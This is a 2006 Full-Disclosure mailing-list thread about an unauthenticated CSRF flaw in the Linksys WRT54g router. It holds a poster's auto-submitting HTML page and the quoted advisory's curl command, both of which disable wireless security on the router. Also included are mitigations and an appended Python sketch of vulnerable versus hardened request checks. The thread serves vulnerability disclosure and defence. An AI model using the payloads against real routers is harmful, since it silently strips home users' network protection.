Message-ID: <b7a807650611040355u6a959e1ape9988f3ba527da78@mail.gmail.com>
Date: Sat, 4 Nov 2006 11:55:15 +0000
From: pagvac <unknown.pentester@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: Ginsu Rabbit <ginsurabbit@...mail.com>
Subject: Re: linksys WRT54g authentication bypass
Sorry I'm replying to this post after so long, but I was bored this
morning and decided to create a specially-crafted HTML page that would
allow me to replicate the unauth CSRF attack described by Ginsu
Rabbit. Very interesting vuln btw :-)
The following is the code for the specially-crafted HTML page.
Unfortunately, I do not have a vulnerable Linksys router to test this,
so I simply strictly followed the structure of the POST request as
described in the advisory. Hopefully it should work.
It'd be cool if someone could test this against a vulnerable model.
Here is an on-line copy:
http://ikwt.com/projects/linksys/BID19347_test.html
<html>
<head><title>BID 19347 specially-crafted html page - vuln found by
Ginsu Rabbit</title></head>
<body>
<form action="http://192.168.0.1/Security.tri" method="POST">
<input type="hidden" name="SecurityMode" value="0">
<input type="hidden" name="layout" value="en">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
On 8/4/06, Ginsu Rabbit <ginsurabbit@...mail.com> wrote:
> I'm having some trouble believing this hasn't been reported before. If you
> have a linksys router handy, please check to see whether it is vulnerable to
> this attack. It's possible that all of the linksys router web UIs have the
> same bug. Hopefully the problem is isolated to one particular model or
> firmware revision.
>
> I. DESCRIPTION
>
> Tested product: Linksys WRT54g home router, firmware revision 1.00.9.
>
> Problem #1: No password validation for configuration settings.
>
> The WRT54g does not attempt to verify a username and password when
> configuration settings are being changed. If you wish to read configuration
> settings, you must provide the administrator ID and password via HTTP basic
> authentication. No similar check is done for configuration changes.
>
> This request results in a user-id and password prompt:
> GET /wireless.htm
>
> This request disables wireless security on the router, with no password
> prompt:
> POST /Security.tri
> Content-Length: 24
>
> SecurityMode=0&layout=en
>
> Problem #2: Cross-site request forgery
>
> The web administration console does not verify that the request to change
> the router configuration is being made with the consent of the
> administrator. Any web site can force a browser to send a request to the
> linksys router, and the router will accept the request.
>
>
> II. Exploitation
>
> The combination of these two bugs means that any internet web site can
> change the configuration of your router. Recently published techniques for
> port-scanning and web server fingerprinting via java and javascript make
> this even easier. The attack scenario is as follows:
>
> - intranet user visits a malicious web site
> - malicious web site returns specially crafted HTML page
> - intranet user's browser automatically sends a request to the router that
> enables the remote administration interface
> - the owner of the malicious web site now has complete access to your router
>
> I'm not going to share the "specially crafted HTML page" at this time, but
> it isn't all that special.
>
>
> III. DETECTION
>
> If your router is vulnerable, the following curl command will disable
> wireless security on your router. Tests for other router models and
> firmware revisions may be different:
>
> curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri
>
>
> IV. MITIGATION
>
> 1) Make sure you've disabled the remote administration feature of your
> router. If you have this "feature" enabled, anybody on the internet can
> take control of the router.
>
> 2) Change the IP address of the router to a random value, preferably in the
> range assigned to private networks. For example, change the IP address to
> 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive. This
> makes it more difficult for an attacker to forge the request necessary to
> change the router configuration. This mitigation technique might not help
> much if you have a java-enabled browser, because of recently published
> techniques for determining gateway addresses via java applets.
>
> 3) Disable HTTP access to the administration interface of the router,
> allowing only HTTPS access. Under most circumstances, this will cause the
> browser to show a certificate warning before the configuration is changed.
>
> V. VENDOR NOTIFICATION
>
> Linksys customer support was notified on June 24, 2006.
> Full disclosure on August 4, 2006.
>
> --
> GR
>
--
pagvac
[http://ikwt.com/]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
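The two problems Ginsu Rabbit describes, modelled as request-authorization logic with the fixes beside them: the vulnerable policy applies any POST to Security.tri without credentials, while the hardened one authenticates every request and additionally requires a same-origin check plus a per-session token on state changes, because a browser replays cached Basic credentials on a forged POST. This is an added example, not code from either poster or from Linksys firmware; the admin credentials, the csrf_token form field and the Origin/Referer check are assumptions (the Origin header itself postdates this thread).

```python
import base64
import hmac
from urllib.parse import parse_qs, urlparse

ROUTER_HOST = "192.168.0.1"                 # address used in the advisory
ADMIN_USER, ADMIN_PASS = "admin", "secret"  # constructed credentials (assumption)

def basic_auth_ok(headers):
    """Validate an HTTP Basic Authorization header against the admin account."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        user, _, pw = base64.b64decode(auth[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    return (hmac.compare_digest(user.encode(), ADMIN_USER.encode())
            and hmac.compare_digest(pw.encode(), ADMIN_PASS.encode()))

def vulnerable_decision(method, path, headers, body):
    """Problem #1 as reported: GET /wireless.htm prompts for credentials,
    but any POST to Security.tri is applied without them."""
    if method == "GET" and path.endswith(".htm"):
        return "allow" if basic_auth_ok(headers) else "401"
    return "allow"

def hardened_decision(method, path, headers, body, session_token):
    """Fixes for both problems: authenticate every request, and for state
    changes require proof that the request came from the router's own UI."""
    if not basic_auth_ok(headers):
        return "401"                  # problem #1: no more unauthenticated writes
    if method == "POST":
        # Problem #2: the browser attaches cached Basic credentials to a POST
        # forged by another site, so authentication alone is not enough.
        # Require a same-origin Origin/Referer header and the per-session
        # token embedded in the legitimate form (hypothetical field csrf_token).
        origin = headers.get("Origin") or headers.get("Referer", "")
        if urlparse(origin).netloc != ROUTER_HOST:
            return "403"
        sent = parse_qs(body).get("csrf_token", [""])[0]
        if not hmac.compare_digest(sent.encode(), session_token.encode()):
            return "403"
    return "allow"

# The exact request from the advisory, as a constructed sample (no auth header).
FORGED_POST = ("POST", "/Security.tri", {}, "SecurityMode=0&layout=en")
```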